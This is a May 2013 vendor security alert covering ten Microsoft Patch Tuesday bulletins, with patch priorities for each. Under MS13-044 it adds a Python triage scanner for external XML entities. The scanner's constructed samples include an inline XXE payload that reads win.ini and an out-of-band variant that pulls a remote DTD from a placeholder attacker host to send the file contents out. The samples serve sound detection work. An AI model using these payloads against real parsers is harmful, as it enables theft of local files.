May 14, 2013 5:00 PM (PT)
The Tripwire VERT Alert is brought to you by Tripwire VERT, Tripwire's research team. VERT Alerts are distributed for Microsoft Patch Tuesday and for significant security threats.
Today’s VERT Alert addresses 10 new Microsoft Security Bulletins. VERT is actively working on coverage for these bulletins in order to meet our 24-hour SLA and expects to ship ASPL-510 on Wednesday, May 15th.
| Bulletin | Vulnerability | CVE |
| --- | --- | --- |
| MS13-037 | JSON Array Information Disclosure Vulnerability | CVE-2013-1297 |
| MS13-037 | Multiple Use After Free Vulnerabilities in Internet Explorer | MULTIPLE |
| MS13-038 | Internet Explorer Use After Free Vulnerability | CVE-2013-1347 |
| MS13-039 | HTTP.sys Denial of Service Vulnerability | CVE-2013-1305 |
| MS13-040 | XML Digital Signature Spoofing Vulnerability | CVE-2013-1336 |
| MS13-040 | Authentication Bypass Vulnerability | CVE-2013-1337 |
| MS13-041 | Lync RCE Vulnerability | CVE-2013-1302 |
| MS13-042 | Multiple Microsoft Publisher Remote Code Execution Vulnerabilities | MULTIPLE |
| MS13-043 | Word Shape Corruption Vulnerability | CVE-2013-1335 |
| MS13-044 | XML External Entities Resolution Vulnerability | CVE-2013-1301 |
| MS13-045 | Windows Essentials Improper URI Handling Vulnerability | CVE-2013-0096 |
| MS13-046 | DirectX Graphics Kernel Subsystem Double Fetch Vulnerability | CVE-2013-1332 |
| MS13-046 | Win32k Buffer Overflow Vulnerability | CVE-2013-1333 |
| MS13-046 | Win32k Window Handle Vulnerability | CVE-2013-1334 |
MS13-037
This month starts the same way every other month does, with Internet Explorer as the first bulletin. The most important takeaway from this patch is that it contains fixes for a Pwn2Own 2013 vulnerability, CVE-2013-2551, as well as a defense-in-depth fix that originated at Pwn2Own. Internet Explorer is usually the first thing you should patch and this month is no different. We actually have a three-way tie for “first patch to install”, with two Internet Explorer patches and the HTTP.sys patch all sitting at the top of the list. Installation order should depend on the purpose of the system: patch IE first on workstations and HTTP.sys first on servers.
MS13-038
The second bulletin of the month is also the second IE bulletin of the month. It could almost be considered an out-of-band release, since it is a direct response to the recent IE 0-day reported on the FireEye blog. Because exploits are known to be in the wild, this patch should be installed ASAP.
MS13-039
MS13-039 is a rare bulletin in that it affects only Microsoft’s newest operating systems. The vulnerability exists within HTTP.sys, so anything that relies on it for web capabilities (e.g. IIS) is affected. A malicious HTTP request triggers an infinite loop in the HTTP stack, denying service to the host. If you’re running a web server on Windows Server 2012, this should be at the top of your list.
MS13-040
Up next, we have the .NET Framework. The issues in .NET are relatively minor; the most important issue is that the signature of an XML file can be spoofed due to a lack of validation.
MS13-041
This bulletin resolves an issue affecting Microsoft Lync and its predecessor, Microsoft Communicator. Successful exploitation of the vulnerability requires that the user accept a program-sharing request from a malicious user. Until the patch is applied, users should be advised to decline program-sharing requests from users they don’t know or trust.
MS13-042
The biggest bulletin of the month, MS13-042, kicks off a chain of three Microsoft Office related bulletins. The 11 CVEs patched by MS13-042 all represent code execution issues when opening malicious Publisher documents. Publisher 2003, 2007, and 2010 are affected.
MS13-043
The second Office bulletin this month affects Microsoft Word 2003 and Word Viewer. A malicious RTF document can trigger the vulnerable code, which means that the biggest risk comes from RTF-formatted email to recipients who have reconfigured Outlook 2003 to use Word 2003 as the default mail reader.
MS13-044
The final Office bulletin affects Visio and is a rather interesting information disclosure issue. A specially crafted document can declare an XML external entity that, when Visio resolves it, reads a local file and sends its contents to a remote server. As with Publisher, the affected versions are 2003, 2007, and 2010.
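The shape of the MS13-044 document is worth seeing, because the same pattern shows up wherever an XML parser is allowed to resolve external entities. The following is an added illustration written for this alert; it is not code from Microsoft, Tripwire or the bulletin, and it does not model Visio’s own parser. It uses Python’s stdlib expat bindings purely to read the DTD declarations of a document and flag any entity that points outside the document, without fetching anything. The two malicious samples and the benign one are constructed for the example; the `attacker.invalid` host and the `win.ini` path are placeholders, not indicators from a real attack.

```python
import xml.parsers.expat


def find_external_entities(xml_bytes):
    """Scan the internal DTD subset of an XML document and return every entity
    declared with an external identifier (SYSTEM and/or PUBLIC) as
    (entity_name, is_parameter_entity, system_id) tuples.

    Nothing is fetched: expat's default parameter-entity mode never loads
    external parameter entities, and the general-entity handler below
    acknowledges a reference without creating a sub-parser, so file:// and
    http:// targets stay unresolved. A document that fails to parse after its
    DOCTYPE still yields the declarations seen before the error.
    """
    found = []

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        # Internal entities carry a literal value and no identifiers; external
        # ones carry a SYSTEM and/or PUBLIC identifier. Only the latter can pull
        # data from outside the document.
        if system_id is not None or public_id is not None:
            found.append((name, bool(is_param), system_id))

    parser = xml.parsers.expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    # Returning a true value tells expat the reference was handled; since no
    # sub-parser is created, the referenced resource is never opened.
    parser.ExternalEntityRefHandler = lambda context, base, system_id, public_id: 1
    try:
        parser.Parse(xml_bytes, True)
    except xml.parsers.expat.ExpatError:
        pass
    return found


def is_suspicious(xml_bytes):
    """True when the document declares any external entity at all. Document
    content has no legitimate need to declare external entities, so a single
    hit is enough to quarantine the file for review."""
    return bool(find_external_entities(xml_bytes))


# Constructed samples (not taken from any real Visio file).
# 1. Classic inline read: the file contents are substituted into the document.
INLINE_XXE = b"""<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini">
]>
<data>&xxe;</data>
"""

# 2. Out-of-band variant matching the MS13-044 description: one parameter
#    entity reads the local file, a second loads a remote DTD whose job is to
#    build a URL that carries the file contents to the attacker's server.
OOB_XXE = b"""<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY % file SYSTEM "file:///C:/Windows/win.ini">
  <!ENTITY % remote SYSTEM "http://attacker.invalid/exfil.dtd">
  %remote;
]>
<data/>
"""

# 3. Benign document with a DOCTYPE that declares only an internal entity.
BENIGN = b"""<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY company "Example Corp">
]>
<data>&company;</data>
"""

if __name__ == "__main__":
    for label, doc in (("inline", INLINE_XXE), ("oob", OOB_XXE), ("benign", BENIGN)):
        print(label, find_external_entities(doc))
```

Run the function over any XML content you can extract from a document (a Visio XML drawing, or the XML parts inside a zipped Office file) as a triage check on mail gateways or file shares while the patch is rolled out; it complements the patch rather than replacing it, since the vulnerable resolution happens inside Visio, not in this scanner.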
MS13-045
The second-to-last bulletin of the month fixes an issue in Windows Writer, a component of Windows Essentials. The vulnerability allows an attacker to overwrite files on the local file system; removing the Windows Writer URI handler easily mitigates it. Users of Windows Essentials should also note that both the 2011 and 2012 versions are affected but a patch has not been released for 2011. Users of that version should upgrade to Windows Essentials 2012.
MS13-046
The final bulletin this month is one we’ve grown accustomed to seeing. It contains privilege escalation issues affecting Windows kernel-mode drivers; Win32k and DirectX are specifically affected by the vulnerabilities listed in this bulletin.
As always, VERT recommends that you apply patches as soon as possible but also that you fully vet patches (when possible) before applying them to production systems.
Ease of Use (published exploits) to Risk Table

| Ease of Use | Bulletins |
| --- | --- |
| Automated Exploit | MS13-038 |
| Easy | |
| Moderate | |
| Difficult | |
| Extremely Difficult | |
| No Known Exploit | MS13-039 |

Exposure categories: Local Availability, Local Access, Remote Availability, Remote Access, Local Privileged, Remote Privileged.
All data and commentary is based on information available when the VERT Alert is published. The VERT Alert may be updated on the website as new information surfaces: http://www.ncircle.com/index.php?s=resources_VERT-Alert.